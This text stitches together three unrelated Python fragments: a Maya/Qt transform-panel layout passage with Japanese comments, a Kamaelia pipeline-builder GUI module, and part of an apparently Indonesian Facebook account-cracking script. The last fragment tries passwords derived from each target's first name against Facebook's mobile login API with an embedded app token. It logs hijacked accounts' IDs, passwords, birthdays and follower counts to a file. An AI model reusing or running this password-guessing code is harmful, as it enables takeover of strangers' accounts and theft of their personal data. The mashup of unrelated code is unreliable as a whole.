self.all_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.all_filter.text()))
self.all_filter.setChecked(True)
self.main_layout.addWidget(self.all_filter, vn, vh, 1, hw)
vh += hw
self.transform_filter = make_flat_button(name='Trs', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Transform node')
self.transform_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.transform_filter.text()))
self.main_layout.addWidget(self.transform_filter, vn, vh, 1, hw)
vh += hw
self.joint_filter = make_flat_button(name='Jot', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Joint')
self.joint_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.joint_filter.text()))
self.main_layout.addWidget(self.joint_filter, vn, vh, 1, hw)
vh += hw
self.shape_filter = make_flat_button(name='Sap', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Shape node')
self.shape_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.shape_filter.text()))
self.main_layout.addWidget(self.shape_filter, vn, vh, 1, hw)
vh += hw
self.dummy_but_a = make_flat_button(name='Nan', text=mute_text, bg=hilite, checkable=False, w_max=fw, h_max=fh, tip='Future filters will be added')
self.main_layout.addWidget(self.dummy_but_a , vn, vh, 1, hw)
vh += hw
self.dummy_but_b = make_flat_button(name='Nan', text=mute_text, bg=hilite, checkable=False, w_max=fw, h_max=fh, tip='Future filters will be added')
self.main_layout.addWidget(self.dummy_but_b , vn, vh, 1, hw)
vh += hw
vn+=1
vh = 0#ボタンの開始地点
self.parent_cons_filter = make_flat_button(name='Pac', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Parent Constraint')
self.parent_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.parent_cons_filter.text()))
self.main_layout.addWidget(self.parent_cons_filter, vn, vh, 1, hw)
vh += hw
self.point_cons_filter = make_flat_button(name='Poc', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Point Constraint')
self.point_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.point_cons_filter.text()))
self.main_layout.addWidget(self.point_cons_filter, vn, vh, 1, hw)
vh += hw
self.orient_cons_filter = make_flat_button(name='Orc', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Orient Constraint')
self.orient_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.orient_cons_filter.text()))
self.main_layout.addWidget(self.orient_cons_filter, vn, vh, 1, hw)
vh += hw
self.scale_cons_filter = make_flat_button(name='Slc', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Scale Constraint')
self.scale_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.scale_cons_filter.text()))
self.main_layout.addWidget(self.scale_cons_filter, vn, vh, 1, hw)
vh += hw
self.aim_cons_filter = make_flat_button(name='Aic', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Aim Constraint')
self.aim_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.aim_cons_filter.text()))
self.main_layout.addWidget(self.aim_cons_filter, vn, vh, 1, hw)
vh += hw
self.select_line_c = make_h_line()
self.dummy_but_c = make_flat_button(name='Nan', text=mute_text, bg=hilite, checkable=False, w_max=fw, h_max=fh, tip='Future filters will be added')
self.main_layout.addWidget(self.dummy_but_c , vn, vh, 1, 1)
vh += hw
vn+=1
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#self.main_layout.addWidget(self.select_line_c, vn, 0, 1 ,11)
#vn+=1
#一括操作ようにリストにしておく
self.all_select_but_list = [select_but, select_group_but, center_mode_but]
self.all_filter_but_list = [self.select_Marker_but, self.select_joint_but,
self.select_curve_but, self.select_surface_but,
self.select_deform_but, self.select_other_but]
self.all_search_widgets = [self.selection_line, self.index_line, self.pick_down, self.pick_left, self.pick_up, self.pick_right]
self.filter_but_list = [self.all_filter, self.transform_filter,
self.joint_filter,self.shape_filter,
self.dummy_but_a, self.dummy_but_b,
self.parent_cons_filter, self.point_cons_filter,
self.orient_cons_filter, self.scale_cons_filter,
self.aim_cons_filter, self.dummy_but_c]
self.select_lines = [self.select_line_a]
#self.select_line_b,
#self.select_line_c]
for but in self.filter_but_list:
but.rightClicked.connect(lambda : self.pop_option_window(mode='filter'))
self.select_section_but = self.all_select_but_list+self.all_filter_but_list+self.all_search_widgets+self.filter_but_list+self.select_lines
#高さを保存
self.select_section_height = [but.height() for but in self.select_section_but]
self.select_top.rightClicked.connect(lambda : self.toggle_ui(buttons=self.select_section_but, heights=self.select_section_height))
#--------------------------------------------------------------------------------
#トランスフォームエリア
#action.triggered.connect()
self.transform_top = make_flat_button(name=u'▽ Transform ', checkable=False, flat=False, text=text_col, h_min=top_h, bg=mid_color, hover=top_hover)
self.transform_top.clicked.connect(lambda : self.pop_top_menus(but=self.transform_top, menu_func=self.create_trans_menu))
#qt.change_button_color(self.transform_top, textColor=text_col, bgColor=mid_color)
#検索、セレクション表示窓--------------------------------------------------------------------------------
self.main_layout.addWidget(self.transform_top, vn, 0, 1 ,11)
vn+=1
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#--------------------------------------------------------------------------------
#スケール
global scale_x
global scale_y
global scale_z
global select_scale
global key_scale_x
global key_scale_y
global key_scale_z
line_min_size = 55
wheel_max_size = 26
axis_size = (24, 20)#xyzアイコンの大きさ
axis_w = 24#軸ボタンの幅
axis_h = 20#軸ボタンの高さ
sel_w = 22#SRT選択ボタンの幅
sel_h = 22#SRT選択ボタンの幅
anim_b = 2#ボタンの幅
text_b = 6#ラインの幅
axis_b = 2#軸ボタンの幅
sel_b = 1#選択ボタンの幅
key_but_tip = lang.Lang(en=u'Set / release animation key\nLeft Click >> Single axis setting\nRight Click >> All axis setting',
ja=u'アニメーションキーを設定/解除\n左クリック→単独軸設定\n右クリック→全軸一括設定')
lock_but_tip = lang.Lang(en=u'Lock / Unlock Attribute\nLeft Click >> Lock / Unlock All Axis\nRight Click >> Show Axis Lock Menu',
ja=u'アトリビュートをロック/解除\n左クリック→全軸一括ロック/ロック解除\n右クリック→各軸ロックメニュー表示')
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_scale_x = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_scale_x.clicked.connect(lambda : set_key_frame(mode=0, axis=0))
key_scale_x.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=0, axis=3)))
self.main_layout.addWidget(key_scale_x, vn, tw, 1, anim_b)
tw += anim_b
scale_x = self.make_line_edit(text=string_col, bg=bg_col)
scale_x.setMinimumWidth(line_min_size)
scale_x.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=scale_x.text(), current=(0, 0))))
scale_x.textChanged.connect(lambda : self.keep_pre_line_text(text=scale_x.text(), current=(0, 0)))#入力変更が成されたかどうかを判定するように即時保存を実行
scale_x.editingFinished.connect(qt.Callback(lambda : self.scaling(text=scale_x.text(), axis=0)))
self.main_layout.addWidget(scale_x, vn, tw, 1, text_b)
tw += text_b
self.but_scale_x = make_flat_button(icon=image_path+self.x_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_scale_x, vn, tw, 1 ,axis_b)
tw += axis_b
#切り替え
select_scale = make_flat_button(icon=image_path+self.s, icon_size=(20, 20),
name = '', text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h)
select_scale.clicked.connect(lambda : self.toggle_select_mode(mode=0))
self.main_layout.addWidget(select_scale, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_scale_y = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_scale_y.clicked.connect(lambda : set_key_frame(mode=0, axis=1))
key_scale_y.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=0, axis=3)))
self.main_layout.addWidget(key_scale_y, vn, tw, 1, anim_b)
tw += anim_b
scale_y = self.make_line_edit(text=string_col, bg=bg_col)
scale_y.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=scale_y.text(), current=(0, 1))))#マルチラインは先にコネクト
scale_y.textChanged.connect(lambda : self.keep_pre_line_text(text=scale_y.text(), current=(0, 1)))#入力変更が成されたかどうかを判定するように即時保存を実行
scale_y.editingFinished.connect(qt.Callback(lambda : self.scaling(text=scale_y.text(), axis=1)))
self.main_layout.addWidget(scale_y, vn, tw, 1 ,text_b)
tw += text_b
self.but_scale_y = make_flat_button(icon=image_path+self.y_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_scale_y, vn, tw, 1 ,axis_b)
tw += axis_b
#ロック状態切り替え
self.lock_attribute_scale = make_flat_button(icon=image_path+self.l, icon_size=(20, 20),
name = '', checkable=False, text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h, tip=lock_but_tip.output())
self.lock_attribute_scale.clicked.connect(qt.Callback(lambda : self.attribute_lock_state(mode=0)))
self.lock_attribute_scale.rightClicked.connect(lambda : RockAttrMenu(name='Scale', mode=0))
self.main_layout.addWidget(self.lock_attribute_scale, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_scale_z = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_scale_z.clicked.connect(lambda : set_key_frame(mode=0, axis=2))
key_scale_z.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=0, axis=3)))
self.main_layout.addWidget(key_scale_z, vn, tw, 1, anim_b)
tw += anim_b
scale_z = self.make_line_edit(text=string_col, bg=bg_col)
scale_z.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=scale_z.text(), current=(0, 2))))
scale_z.textChanged.connect(lambda : self.keep_pre_line_text(text=scale_z.text(), current=(0, 2)))#入力変更が成されたかどうかを判定するように即時保存を実行
scale_z.editingFinished.connect(qt.Callback(lambda : self.scaling(text=scale_z.text(), axis=2)))
self.main_layout.addWidget(scale_z, vn, tw, 1 ,text_b)
tw += text_b
self.but_scale_z = make_flat_button(icon=image_path+self.z_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_scale_z, vn, tw, 1 ,axis_b)
tw += axis_b
#XYZ全部ボタン
self.but_scale_all = make_flat_button(icon=image_path+self.all_axis_icon, name='', text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h)
self.main_layout.addWidget(self.but_scale_all, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
self.trs_line_a = make_h_line()
self.main_layout.addWidget(self.trs_line_a, vn, 0, 1 ,11)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
#ローテーション
global rot_x
global rot_y
global rot_z
global key_rot_x
global key_rot_y
global key_rot_z
global select_rot
key_rot_x = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_rot_x.clicked.connect(lambda : set_key_frame(mode=1, axis=0))
key_rot_x.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=1, axis=3)))
self.main_layout.addWidget(key_rot_x, vn, tw, 1, anim_b)
tw += anim_b
rot_x = self.make_line_edit(text=string_col, bg=bg_col)
rot_x.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=rot_x.text(), current=(1, 0))))
rot_x.textChanged.connect(lambda : self.keep_pre_line_text(text=rot_x.text(), current=(1, 0)))#入力変更が成されたかどうかを判定するように即時保存を実行
rot_x.editingFinished.connect(qt.Callback(lambda : self.rotation(text=rot_x.text(), axis=0)))
self.main_layout.addWidget(rot_x, vn, tw, 1 ,text_b)
tw += text_b
self.but_rot_x = make_flat_button(icon=image_path+self.x_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
#qt.change_button_color(self.but_rot_x, textColor=text_col, bgColor=red)
self.main_layout.addWidget(self.but_rot_x, vn, tw, 1 ,axis_b)
tw += axis_b
#切り替え
select_rot = make_flat_button(icon=image_path+self.r, icon_size=(20, 20),
name = '', text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h)
select_rot.clicked.connect(lambda : self.toggle_select_mode(mode=1))
self.main_layout.addWidget(select_rot, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_rot_y = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_rot_y.clicked.connect(lambda : set_key_frame(mode=1, axis=1))
key_rot_y.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=1, axis=3)))
self.main_layout.addWidget(key_rot_y, vn, tw, 1, anim_b)
tw += anim_b
rot_y = self.make_line_edit(text=string_col, bg=bg_col)
rot_y.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=rot_y.text(), current=(1, 1))))
rot_y.textChanged.connect(lambda : self.keep_pre_line_text(text=rot_y.text(), current=(1, 1)))#入力変更が成されたかどうかを判定するように即時保存を実行
rot_y.editingFinished.connect(qt.Callback(lambda : self.rotation(text=rot_y.text(), axis=1)))
self.main_layout.addWidget(rot_y, vn, tw, 1 ,text_b)
tw += text_b
self.but_rot_y = make_flat_button(icon=image_path+self.y_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_rot_y, vn, | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
# First proper iteration of this code:
# * Sat Sep 16 11:24:50 BST 2006, passing through Coventry
#
# Was able to create a simple video server completely graphically.
#
# Issues:
# * Code needs tidying up
# * Want to be able to re-edit components that have already been created
# * Want to be able to delete already created components
# * Want to be able to break already created linkages
#
# Good start though !
#
# Sunday 17:
# * Can delete already created components
# * Can break already created linkages
#
#
# simple kamaelia pipeline builder GUI
# run this program
from Kamaelia.UI.Pygame.Button import Button
import Kamaelia.Support.Data.Repository
import Axon
import pprint
C = Kamaelia.Support.Data.Repository.GetAllKamaeliaComponents()
COMPONENTS = {}
for key in C.keys():
COMPONENTS[".".join(key)] = C[key]
import inspect
def getAllClasses( modules ):
_modules = list(modules.keys())
_modules.sort()
for modname in _modules:
try:
for entry in getModuleConstructorArgs( modname, modules[modname] ):
yield entry
except ImportError:
print "WARNING: Import Error: ", modname
continue
def getModuleConstructorArgs( modulename, classnames):
clist = []
module = __import__(modulename, [], [], classnames)
for classname in classnames:
theclass = eval("module."+classname)
entry = { "module" : modulename,
"class" : classname,
"classdoc" : theclass.__doc__,
"initdoc" : theclass.__init__.__doc__,
"args" : getConstructorArgs(theclass),
"theclass" : theclass,
}
clist.append(entry)
return clist
def getConstructorArgs(component):
initfunc = eval("component.__init__")
try:
(args, vargs, vargkw, defaults) = inspect.getargspec(initfunc)
except TypeError, e:
print "FAILURE", str(component), repr(component), component
raise e
arglist = [ [arg] for arg in args ]
if defaults is not None:
for i in range(0,len(defaults)):
arglist[-1-i].append( repr(defaults[-1-i]) )
del arglist[0] # remove 'self'
return {"std":arglist, "*":vargs, "**":vargkw}
class Magic(Axon.Component.component):
"This is where the magic happens"
"""
OK, basic actions needed:
* ADD COMPONENT (DONE)
* *This also needs to store what the arguments were* (DONE)
* Beyond the immediate scope of the visualiser component (DONE)
* Implies a filter of somekind (undecorate/decorate) (DONE)
* ADD COMPONENT (DONE)
* FOR EACH INBOX -- NEW (DONE)
* ADD AND LINK (DONE)
* FOR EACH OUTBOX -- NEW (DONE)
* ADD AND LINK (DONE)
* DELETE COMPONENT
* DELETE OUTBOXES -- NEW
* DELETE INBOXES -- NEW
* DELETE COMPONENT
* LINK -- NEW ( NO IMPLICIT LINK ANYMORE) (DONE)
* THIS BOX (DONE)
* TO THIS BOX (DONE)
"""
Inboxes = {
"from_panel" : "User events from the panel",
"from_topology" : "User events from the topology visualiser",
"makelink" : "Simple event to create links",
"inbox" : "unused, default",
"control" : "unused, default",
}
Outboxes={
"to_topology" : "Messages to control the topology",
"to_serialiser" : "Messages about the system topology are sent here for turning into code",
"signal" : "default, unused",
"outbox" : "default, unused",
}
def __init__(self):
super(Magic,self).__init__()
self.topologyDB = {}
self.LINKMODE = False
self.linksource = None
self.linksink = None
self.topology = []
def main(self):
print "Let the magic begin!"
while 1:
if self.dataReady("from_panel"):
event = self.recv("from_panel")
print "MESSAGE FROM PANEL"
pprint.pprint(event)
if event[0] == "ADD":
nodeinfo = self.addNodeToTopology(event)
self.addNodeLocalDB(event, nodeinfo)
if event[0] == "DEL":
self.handleDeleteNode(event)
if self.dataReady("from_topology"):
event = self.recv("from_topology")
if event[0] == "SELECT":
self.currentSelectedNode = event[2]
print "HMM, the next should display the most recently selected node"
print "AHA! It does"
print "We need to tell the panel to update itself with these details then"
self.debug_PrintCurrentNodeDetails()
if self.dataReady("makelink"):
self.recv("makelink")
self.LINKMODE = True
self.linksource = None
self.linksink = None
yield 1
def handleDeleteNode(self, event):
"""
Messages look like this:
* ("DEL", "2.control")
* ("DEL", "2")
"""
print "DELETE NODE, identifying type", event
nodeid = event[1]
nodetype = self.topologyDB[nodeid][0]
if nodetype == "COMPONENT":
( nodetype, label, inboxes, outboxes, event ) = self.topologyDB[nodeid]
print "ASKED TO DELETE component"
print "We need to do this:"
print " * delete the component node"
self.send( [ "DEL", "NODE", nodeid ], "to_topology" )
print " * delete its inboxes"
print inboxes
for inbox in inboxes:
boxid = inbox[0]
self.send( [ "DEL", "NODE", boxid ], "to_topology" )
print " * delete its outboxes"
print outboxes
for outbox in outboxes:
boxid = outbox[0]
self.send( [ "DEL", "NODE", boxid ], "to_topology" )
"""
We need to do this:
* delete the component node
* delete its inboxes
[['1.control', 'control'], ['1.inbox', 'inbox']]
* delete its outboxes
[['1.outbox', 'outbox'], ['1.signal', 'signal']]
* delete linkages to/from said linkages
NEED TO REMOVE LINKAGE ['1.outbox', '3.inbox']
This needs to be removed from:
self.topology
self.topologyDB
also needs to be removed from the axon visualiser
(del node requests)
"""
# Remove links from self.topology
self.topology = [ link for link in self.topology if not self.matchesNode(nodeid, link) ]
# remove inboxes from topologyDB
inboxids = [ x[0] for x in inboxes ]
for boxid in inboxids:
del self.topologyDB[boxid]
# remove outboxes from topologyDB
outboxids = [ x[0] for x in outboxes ]
for boxid in outboxids:
del self.topologyDB[boxid]
# Deleted the component itself from the topologyDB
del self.topologyDB[nodeid]
else:
boxid = nodeid
( boxtype, label, nodeid ) = self.topologyDB[boxid]
print "ASKED TO DELETE box"
print " * Can't actually do that!"
print " * Deleting linkages to/from that box instead!"
if boxtype == "INBOX":
print "DELETING AN INBOX!", nodeid, boxid
# Remove links from visualiser
for link in self.topology:
if self.matchesNode(boxid, link):
source, sink = link
print [ "DEL", "LINK", source, sink ], "to_topology", boxid, link, nodeid
self.send( [ "DEL", "LINK", source, sink ], "to_topology" )
# Remove links from self.topology
self.topology = [ link for link in self.topology if not self.matchesNode(boxid, link) ]
if boxtype == "OUTBOX":
print "DELETING AN OUTBOX!"
self.updateSerialiser()
def updateSerialiser(self):
self.send( { "nodes": self.topologyDB, "links": self.topology },
"to_serialiser")
def makeLink(self):
self.send( [ "ADD", "LINK",
self.linksource,
self.linksink,
], "to_topology" )
self.topology.append([self.linksource,self.linksink])
self.updateSerialiser()
def matchesNode(self, nodeid, link):
print "nodeid, link", nodeid, link
linksource,linksink = link
if "." not in nodeid:
print "HERE 1"
source, sourcebox = linksource.split(".")
sink, sinkbox = linksink.split(".")
print "(source == nodeid)", (source == nodeid)
print "(sink == nodeid)", (sink == nodeid)
return (source == nodeid) or (sink == nodeid)
else:
print "HERE 2"
print "(linksource == nodeid)", (linksource == nodeid)
print "(linksink == nodeid)", (linksink == nodeid)
return (linksource == nodeid) or (linksink == nodeid)
def debug_PrintCurrentNodeDetails(self):
print "CURRENT NODE", self.currentSelectedNode
if self.currentSelectedNode is None:
self.LINKMODE = False
return
if self.LINKMODE:
if self.linksource == None:
self.linksource = self.currentSelectedNode
else:
self.linksink = self.currentSelectedNode
self.makeLink()
self.LINKMODE = False
print self.topologyDB[self.currentSelectedNode]
def addNodeLocalDB(self, event, nodeinfo):
( nodeid, label, inboxes, outboxes ) = nodeinfo
self.topologyDB[nodeid] = ( "COMPONENT", label, inboxes, outboxes, event )
for inbox in inboxes:
( boxid, label ) = inbox
self.topologyDB[boxid] = ( "INBOX", label, nodeid )
for outbox in outboxes:
( boxid, label ) = outbox
self.topologyDB[boxid] = ( "OUTBOX", label, nodeid )
self.updateSerialiser()
def addNodeToTopology(self,event):
print "ADD NODE"
nodeid = "ID"
label = "LABEL"
(label, nodeid) = event[1]
self.send( ["ADD", "NODE",
nodeid,
label,
"randompos",
"component"
], "to_topology" )
inboxes = []
for inbox in event[3]["configuration"]["theclass"].Inboxes:
boxid = str(nodeid) + "." + inbox
self.send( [ "ADD", "NODE",
boxid,
inbox,
"randompos",
"inbox"
], "to_topology" )
self.send( [ "ADD", "LINK",
nodeid,
boxid,
], "to_topology" )
inboxes.append( [ boxid, inbox] )
outboxes = []
for outbox in event[3]["configuration"]["theclass"].Outboxes:
boxid = str(nodeid) + "." + outbox
self.send( [ "ADD", "NODE",
boxid,
outbox,
"randompos",
"outbox"
], "to_topology" )
self.send( [ "ADD", "LINK",
nodeid,
boxid,
], "to_topology" )
outboxes.append( [ | |
c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass1 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass1
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass1 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass1 + birthday + subscribers)
else:
pass2 = c['first_name'] + '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass2
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass2 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass2
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass2 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass2 + birthday + subscribers)
else:
pass3 = c['first_name'] + '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
